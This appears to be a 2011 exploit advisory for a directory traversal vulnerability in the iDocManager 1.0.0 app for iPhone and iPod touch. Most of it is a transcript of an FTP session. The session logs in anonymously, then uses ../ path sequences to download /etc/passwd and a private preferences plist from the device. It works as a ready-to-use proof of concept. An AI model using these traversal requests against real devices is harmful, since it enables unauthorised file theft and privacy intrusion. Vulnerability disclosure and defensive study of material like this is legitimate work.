# Exploit Title: iDocManager v1.0.0 for iPhone / iPod touch, Directory Traversal # Date: 02/24/2011 # Author: R3d@l3rt, Sp@2K, Sunlight, H@ckk3y # Software Link : http://itunes.apple.com/kr/app/idocmanager/id376421606?mt=8 # Version: 1.0.0 # Tested on: iPhone, iPod 3GS with 4.2.1 firmware # There is directory traversal vulnerability in the iDocManager. # Exploit Testing C:\>ftp ftp> open 192.168.0.70 20000 Connected to 192.168.0.70. 220 DiddyDJ FTP server ready. User (192.168.0.70:(none)): anonymous 331 Password required for anonymous Password: 230 User logged in. ftp> dir 200: PORT command successful. 150: Opening ASCII mode data connection for '/bin/ls'. 226 Transfer complete. ftp: 4 bytes received in 0.02Seconds 0.25Kbytes/sec. ftp> get ../../../../../../etc/passwd 200: PORT command successful. 150: Opening BINARY mode data connection for '../../../../../../etc/passwd'. 226 Transfer complete. ftp: 787 bytes received in 0.02Seconds 49.19Kbytes/sec. ftp> get ../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist 200: PORT command successful. 150: Opening BINARY mode data connection for '../../../../../../../private/var/mobile/Library/Preferences/com.apple.conference.plist'. 226 Transfer complete.